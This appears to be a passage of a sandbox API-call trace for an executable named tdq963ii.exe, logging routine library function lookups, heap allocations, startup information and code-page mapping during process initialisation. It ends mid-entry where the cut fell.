GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0185.133] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0185.134] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0185.134] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0185.134] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0185.134] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0185.134] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0185.134] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0185.135] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0185.135] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0185.135] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0185.135] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0185.135] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0185.136] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0185.136] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0185.136] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0185.136] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0185.136] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0185.136] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0185.137] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0185.137] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0185.137] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0185.137] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0185.137] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0185.137] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0185.138] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0185.138] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0185.138] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0185.138] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0185.140] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0185.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x27948140, dwHighDateTime=0x1d68287)) [0185.146] GetCurrentThreadId () returned 0xa70 [0185.146] GetCurrentProcessId () returned 0xb38 [0185.146] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=30548525947) returned 1 [0185.152] GetProcessHeap () returned 0x600000 [0186.608] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0186.608] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0186.609] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0186.609] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0186.609] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0186.610] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0186.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0186.612] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0186.613] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0186.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3bc) returned 0x617088 [0186.629] GetCurrentThreadId () returned 0xa70 [0186.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x18) returned 0x617450 [0186.630] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x800) returned 0x617470 [0186.630] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3a97814f, hStdError=0x0)) [0186.630] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0186.630] GetFileType (hFile=0x3) returned 0x2 [0187.055] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0187.055] GetFileType (hFile=0x7) returned 0x2 [0187.089] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0187.089] GetFileType (hFile=0xb) returned 0x2 [0187.092] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0187.092] GetEnvironmentStringsW () returned 0x617c78* [0187.092] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xb7a) returned 0x618800 [0187.095] FreeEnvironmentStringsW (penv=0x617c78) returned 1 [0187.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0187.096] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x94) returned 0x617c78 [0187.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xa0) returned 0x617d18 [0187.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3e) returned 0x614db8 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6c) returned 0x617dc0 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x6e) returned 0x617e38 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x78) returned 0x60f8e8 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x62) returned 0x617eb0 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x617f20 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x617f58 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e) returned 0x616a58 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28) returned 0x617fa8 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a) returned 0x616a80 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4a) returned 0x617fd8 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x72) returned 0x60f968 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x618030 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x618068 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1c) returned 0x616aa8 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xd2) returned 0x6180a0 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x7c) returned 0x618180 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x618208 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3a) returned 0x614e00 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x90) returned 0x618248 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x6182e0 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x618310 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x36) returned 0x618348 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x48) returned 0x618388 [0187.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x6183d8 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x614e48 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18) returned 0x618438 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x82) returned 0x618458 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2e) returned 0x6184e8 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1e) returned 0x616ad0 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2c) returned 0x618520 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x618558 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x52) returned 0x6185b8 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x2a) returned 0x618618 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c) returned 0x614e90 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x618650 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x24) returned 0x6186b0 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x30) returned 0x6186e0 [0187.101] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x8c) returned 0x618718 [0187.101] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x618800 | out: hHeap=0x600000) returned 1 [0187.125] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x800) returned 0x6187b0 [0187.125] GetLastError () returned 0x0 [0187.125] SetLastError (dwErrCode=0x0) [0187.125] GetLastError () returned 0x0 [0187.125] SetLastError (dwErrCode=0x0) [0187.125] GetLastError () returned 0x0 [0187.126] SetLastError (dwErrCode=0x0) [0187.126] GetACP () returned 0x4e4 [0187.126] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x220) returned 0x618fb8 [0187.126] GetLastError () returned 0x0 [0187.126] SetLastError (dwErrCode=0x0) [0187.126] IsValidCodePage (CodePage=0x4e4) returned 1 [0187.126] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0187.126] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0187.128] GetLastError () returned 0x0 [0187.128] SetLastError (dwErrCode=0x0) [0187.128] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.131] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0187.131] GetLastError () returned 0x0 [0187.131] SetLastError (dwErrCode=0x0) [0187.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.131] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.131] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0187.131] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0187.131] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿß\x80\x97:äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0187.131] GetLastError () returned 0x0 [0187.132] SetLastError (dwErrCode=0x0) [0187.132] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0187.132] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0187.132] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0187.132] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0187.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 